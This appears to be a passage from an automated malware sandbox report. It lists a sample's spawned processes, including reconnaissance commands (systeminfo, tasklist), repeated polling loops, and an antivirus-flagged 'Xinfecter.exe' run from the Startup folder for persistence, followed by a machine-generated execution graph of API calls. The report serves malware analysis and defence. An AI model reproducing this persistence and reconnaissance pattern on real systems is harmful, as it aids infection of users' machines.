                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:18
                                    Start time:07:39:19
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:19
                                    Start time:07:39:20
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c echo %date%-%time%
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:20
                                    Start time:07:39:20
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:21
                                    Start time:07:39:20
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\systeminfo.exe
                                    Wow64 process (32bit):true
                                    Commandline:systeminfo
                                    Imagebase:0x50000
                                    File size:76'800 bytes
                                    MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:22
                                    Start time:07:39:20
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\find.exe
                                    Wow64 process (32bit):true
                                    Commandline:find /i "os name"
                                    Imagebase:0x3f0000
                                    File size:14'848 bytes
                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:23
                                    Start time:07:39:20
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
                                    Imagebase:0x7ff66e660000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:24
                                    Start time:07:39:20
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:25
                                    Start time:07:39:20
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                    Imagebase:0x340000
                                    File size:418'304 bytes
                                    MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                    Has elevated privileges:true
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:26
                                    Start time:07:39:20
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist /v
                                    Imagebase:0x290000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:27
                                    Start time:07:39:20
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\find.exe
                                    Wow64 process (32bit):true
                                    Commandline:find /I /c "dcdcf"
                                    Imagebase:0x3f0000
                                    File size:14'848 bytes
                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:28
                                    Start time:07:39:21
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat""
                                    Imagebase:0x7ff723740000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:29
                                    Start time:07:39:22
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:30
                                    Start time:07:39:21
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:31
                                    Start time:07:39:22
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\systeminfo.exe
                                    Wow64 process (32bit):true
                                    Commandline:systeminfo
                                    Imagebase:0x50000
                                    File size:76'800 bytes
                                    MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:32
                                    Start time:07:39:22
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\find.exe
                                    Wow64 process (32bit):true
                                    Commandline:find /i "original"
                                    Imagebase:0x3f0000
                                    File size:14'848 bytes
                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:33
                                    Start time:07:39:22
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\timeout.exe
                                    Wow64 process (32bit):true
                                    Commandline:timeout /t 15 /nobreak
                                    Imagebase:0xbc0000
                                    File size:25'088 bytes
                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:34
                                    Start time:07:39:22
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c ver
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:35
                                    Start time:07:39:22
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
                                    Imagebase:0x7ff789db0000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:36
                                    Start time:07:39:23
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
                                    Imagebase:0x7ff723740000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:37
                                    Start time:07:39:23
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:38
                                    Start time:07:39:24
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
                                    Imagebase:0x7ff723740000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:39
                                    Start time:07:39:24
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:40
                                    Start time:07:39:24
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\tasklist.exe
                                    Wow64 process (32bit):false
                                    Commandline:tasklist /v
                                    Imagebase:0x7ff65b2a0000
                                    File size:106'496 bytes
                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:41
                                    Start time:07:39:24
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\find.exe
                                    Wow64 process (32bit):false
                                    Commandline:find /I /c "dcdcf"
                                    Imagebase:0x7ff784700000
                                    File size:17'920 bytes
                                    MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:42
                                    Start time:07:39:28
                                    Start date:06/12/2024
                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"
                                    Imagebase:0x210000
                                    File size:1'260'544 bytes
                                    MD5 hash:F383DB0B947E0BCE25A542DD7FC11139
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 76%, ReversingLabs
                                    Has exited:true

                                    Target ID:43
                                    Start time:07:39:28
                                    Start date:06/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:45
                                    Start time:07:39:37
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
                                    Imagebase:0x290000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:46
                                    Start time:07:39:37
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\find.exe
                                    Wow64 process (32bit):true
                                    Commandline:find /I "8AbMCL2dxM.exe"
                                    Imagebase:0x3f0000
                                    File size:14'848 bytes
                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:47
                                    Start time:07:39:37
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\timeout.exe
                                    Wow64 process (32bit):true
                                    Commandline:timeout /t 15 /nobreak
                                    Imagebase:0xbc0000
                                    File size:25'088 bytes
                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:49
                                    Start time:07:39:52
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
                                    Imagebase:0x290000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:50
                                    Start time:07:39:52
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\find.exe
                                    Wow64 process (32bit):true
                                    Commandline:find /I "8AbMCL2dxM.exe"
                                    Imagebase:0x3f0000
                                    File size:14'848 bytes
                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:51
                                    Start time:07:39:52
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\timeout.exe
                                    Wow64 process (32bit):true
                                    Commandline:timeout /t 15 /nobreak
                                    Imagebase:0xbc0000
                                    File size:25'088 bytes
                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:52
                                    Start time:07:40:07
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
                                    Imagebase:0x290000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:53
                                    Start time:07:40:07
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\find.exe
                                    Wow64 process (32bit):true
                                    Commandline:find /I "8AbMCL2dxM.exe"
                                    Imagebase:0x3f0000
                                    File size:14'848 bytes
                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:54
                                    Start time:07:40:07
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\timeout.exe
                                    Wow64 process (32bit):true
                                    Commandline:timeout /t 15 /nobreak
                                    Imagebase:0xbc0000
                                    File size:25'088 bytes
                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:55
                                    Start time:07:40:22
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
                                    Imagebase:0x290000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:56
                                    Start time:07:40:22
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\find.exe
                                    Wow64 process (32bit):true
                                    Commandline:find /I "8AbMCL2dxM.exe"
                                    Imagebase:0x3f0000
                                    File size:14'848 bytes
                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:57
                                    Start time:07:40:22
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\timeout.exe
                                    Wow64 process (32bit):true
                                    Commandline:timeout /t 15 /nobreak
                                    Imagebase:0xbc0000
                                    File size:25'088 bytes
                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:58
                                    Start time:07:40:37
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
                                    Imagebase:0x290000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:59
                                    Start time:07:40:37
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\find.exe
                                    Wow64 process (32bit):true
                                    Commandline:find /I "8AbMCL2dxM.exe"
                                    Imagebase:0x3f0000
                                    File size:14'848 bytes
                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:60
                                    Start time:07:40:37
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\timeout.exe
                                    Wow64 process (32bit):true
                                    Commandline:timeout /t 15 /nobreak
                                    Imagebase:0x7ff7403e0000
                                    File size:25'088 bytes
                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:61
                                    Start time:07:40:52
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
                                    Imagebase:0x290000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:62
                                    Start time:07:40:52
                                    Start date:06/12/2024
                                    Path:C:\Windows\SysWOW64\find.exe
                                    Wow64 process (32bit):true
                                    Commandline:find /I "8AbMCL2dxM.exe"
                                    Imagebase:0x3f0000
                                    File size:14'848 bytes
                                    MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                      Execution Graph

                                      Execution Coverage:5%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:14.2%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:41
93000->93051 93003 975565 _free 20 API calls 93001->93003 93003->92999 93004->92978 93006 9770e9 ___scrt_is_nonwritable_in_current_image 93005->93006 93013 96ca1b EnterCriticalSection 93006->93013 93008 9770f4 93014 977138 93008->93014 93012 977124 std::_Xfsopen 93012->92993 93013->93008 93015 977147 93014->93015 93016 97715a 93014->93016 93017 9661c3 __Wcrtomb 20 API calls 93015->93017 93016->93015 93018 97716d 93016->93018 93019 97714c 93017->93019 93036 9771dd 77 API calls 93018->93036 93035 965932 26 API calls messages 93019->93035 93022 977176 _Maklocstr 93023 9771b4 93022->93023 93024 9771a1 93022->93024 93028 977110 93022->93028 93037 9729c2 93023->93037 93025 9661c3 __Wcrtomb 20 API calls 93024->93025 93025->93028 93032 97712f 93028->93032 93029 9771d0 93046 96595f 11 API calls _abort 93029->93046 93031 9771dc 93048 96ca63 LeaveCriticalSection 93032->93048 93034 977136 93034->93012 93035->93028 93036->93022 93038 9729dd 93037->93038 93039 9729cf 93037->93039 93040 9661c3 __Wcrtomb 20 API calls 93038->93040 93039->93038 93043 9729f4 93039->93043 93041 9729e5 93040->93041 93047 965932 26 API calls messages 93041->93047 93044 9729ef 93043->93044 93045 9661c3 __Wcrtomb 20 API calls 93043->93045 93044->93028 93044->93029 93045->93041 93046->93031 93047->93044 93048->93034 93049->92999 93050->93000 93051->93001 93052 8c6ff8 InternetReadFile 93053 8c6ff0 SimpleUString::operator= 93052->93053 93053->93052 93057 8c6a9d Concurrency::details::SchedulerBase::Statistics 93053->93057 93062 8ec3b0 28 API calls 5 library calls 93053->93062 93055 8c71bd 93063 965942 93055->93063 93057->93055 93059 8c6aeb Concurrency::details::SchedulerBase::Statistics 93057->93059 93060 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 93059->93060 93061 8c6ea2 93060->93061 93062->93053 93068 9658b7 26 API calls 4 library calls 93063->93068 93065 965951 93069 96595f 11 API calls _abort 93065->93069 93067 96595e 93068->93065 93069->93067 93070 977ec1 93071 977ed1 
93070->93071 93072 977ee9 93070->93072 93073 9661c3 __Wcrtomb 20 API calls 93071->93073 93072->93071 93080 977f00 _strrchr 93072->93080 93074 977ed6 93073->93074 93179 965932 26 API calls messages 93074->93179 93076 977ee1 93077 977fb1 _strrchr 93078 977fd7 93077->93078 93079 978001 93077->93079 93081 977661 33 API calls 93078->93081 93083 975508 std::_Locinfo::_Locinfo_ctor 20 API calls 93079->93083 93080->93077 93080->93080 93180 975508 93080->93180 93082 977fde 93081->93082 93114 977ff7 93082->93114 93116 9780dc 93082->93116 93087 97801b 93083->93087 93091 978023 93087->93091 93092 9729c2 ___std_exception_copy 26 API calls 93087->93092 93088 977f77 93094 9729c2 ___std_exception_copy 26 API calls 93088->93094 93089 977f69 93093 975565 _free 20 API calls 93089->93093 93090 975565 _free 20 API calls 93090->93076 93096 975565 _free 20 API calls 93091->93096 93095 978037 93092->93095 93093->93076 93097 977f85 93094->93097 93098 978042 93095->93098 93099 9780cf 93095->93099 93096->93114 93097->93099 93189 9773e8 93097->93189 93101 9661c3 __Wcrtomb 20 API calls 93098->93101 93198 96595f 11 API calls _abort 93099->93198 93108 978052 93101->93108 93103 9780db 93105 9729c2 ___std_exception_copy 26 API calls 93105->93108 93106 975565 _free 20 API calls 93106->93077 93107 977661 33 API calls 93107->93108 93108->93105 93108->93107 93109 97809a 93108->93109 93110 97808e 93108->93110 93111 9661c3 __Wcrtomb 20 API calls 93109->93111 93112 975565 _free 20 API calls 93110->93112 93113 97809f 93111->93113 93112->93114 93115 9780dc 71 API calls 93113->93115 93114->93090 93115->93091 93117 978102 93116->93117 93118 9780ea 93116->93118 93117->93118 93121 97810e 93117->93121 93122 978118 93117->93122 93119 9661c3 __Wcrtomb 20 API calls 93118->93119 93120 9780ef 93119->93120 93207 965932 26 API calls messages 93120->93207 93124 9661b0 __dosmaperr 20 API calls 93121->93124 93199 982bd3 93122->93199 93124->93118 93126 9780fa 93126->93114 93128 978156 93204 977e99 93128->93204 93129 
97813f 93131 975565 _free 20 API calls 93129->93131 93133 978147 93131->93133 93136 975565 _free 20 API calls 93133->93136 93134 978190 93137 975565 _free 20 API calls 93134->93137 93135 9781b8 93139 9661b0 __dosmaperr 20 API calls 93135->93139 93136->93126 93138 978198 93137->93138 93141 975565 _free 20 API calls 93138->93141 93140 9781c9 Concurrency::details::QuickBitSet::QuickBitSet 93139->93140 93143 9781da CreateProcessA 93140->93143 93142 9781a3 93141->93142 93144 975565 _free 20 API calls 93142->93144 93145 978217 GetLastError 93143->93145 93146 97823c 93143->93146 93144->93126 93208 96618d 20 API calls 3 library calls 93145->93208 93148 9782fa 93146->93148 93149 978248 93146->93149 93209 9617a5 60 API calls _abort 93148->93209 93152 978282 93149->93152 93153 97824c WaitForSingleObject GetExitCodeProcess 93149->93153 93150 978223 93156 97822f 93150->93156 93157 978228 CloseHandle 93150->93157 93154 978287 93152->93154 93155 9782c3 93152->93155 93159 978272 93153->93159 93160 97826b CloseHandle 93153->93160 93161 978292 93154->93161 93162 97828b CloseHandle 93154->93162 93165 9782c7 CloseHandle 93155->93165 93166 9782ce 93155->93166 93163 978233 CloseHandle 93156->93163 93164 97827d 93156->93164 93157->93156 93158 978301 93159->93164 93167 978276 CloseHandle 93159->93167 93160->93159 93161->93164 93169 978296 CloseHandle 93161->93169 93162->93161 93163->93164 93170 975565 _free 20 API calls 93164->93170 93165->93166 93168 975565 _free 20 API calls 93166->93168 93167->93164 93171 9782d6 93168->93171 93169->93164 93172 9782a7 93170->93172 93173 975565 _free 20 API calls 93171->93173 93174 975565 _free 20 API calls 93172->93174 93175 9782e2 93173->93175 93176 9782b3 93174->93176 93177 975565 _free 20 API calls 93175->93177 93178 975565 _free 20 API calls 93176->93178 93177->93126 93178->93126 93179->93076 93181 975515 93180->93181 93182 975555 93181->93182 93183 975540 HeapAlloc 93181->93183 93186 975529 std::_Locinfo::_W_Getmonths 93181->93186 93185 9661c3 
__Wcrtomb 19 API calls 93182->93185 93184 975553 93183->93184 93183->93186 93187 97555a 93184->93187 93185->93187 93186->93182 93186->93183 93252 96d7eb 7 API calls 2 library calls 93186->93252 93187->93088 93187->93089 93190 977404 93189->93190 93193 9773f6 93189->93193 93191 9661c3 __Wcrtomb 20 API calls 93190->93191 93192 97740c 93191->93192 93253 965932 26 API calls messages 93192->93253 93193->93190 93196 97742d 93193->93196 93195 977416 93195->93099 93195->93106 93196->93195 93197 9661c3 __Wcrtomb 20 API calls 93196->93197 93197->93192 93198->93103 93210 98285a 93199->93210 93202 975565 _free 20 API calls 93203 978135 93202->93203 93203->93128 93203->93129 93228 977e48 93204->93228 93206 977ebd 93206->93134 93206->93135 93207->93126 93208->93150 93209->93158 93211 982876 93210->93211 93211->93211 93212 975508 std::_Locinfo::_Locinfo_ctor 20 API calls 93211->93212 93213 9828a4 93212->93213 93214 9828ac 93213->93214 93219 9828c0 93213->93219 93226 96618d 20 API calls 3 library calls 93214->93226 93215 9828b9 93220 975565 _free 20 API calls 93215->93220 93217 9729c2 ___std_exception_copy 26 API calls 93217->93219 93218 9828b3 93221 9661c3 __Wcrtomb 20 API calls 93218->93221 93219->93215 93219->93217 93222 982915 93219->93222 93223 98290b 93220->93223 93221->93215 93227 96595f 11 API calls _abort 93222->93227 93223->93202 93225 982921 93226->93218 93227->93225 93229 977e54 ___scrt_is_nonwritable_in_current_image 93228->93229 93236 96ca1b EnterCriticalSection 93229->93236 93231 977e62 93237 978302 93231->93237 93235 977e80 std::_Xfsopen 93235->93206 93236->93231 93238 97832b 93237->93238 93239 978357 93238->93239 93240 978369 93238->93240 93241 9661c3 __Wcrtomb 20 API calls 93239->93241 93242 975508 std::_Locinfo::_Locinfo_ctor 20 API calls 93240->93242 93243 977e6f 93241->93243 93244 97837d 93242->93244 93248 977e8d 93243->93248 93245 9661c3 __Wcrtomb 20 API calls 93244->93245 93246 97838b 93244->93246 93245->93246 93247 975565 _free 20 API calls 93246->93247 
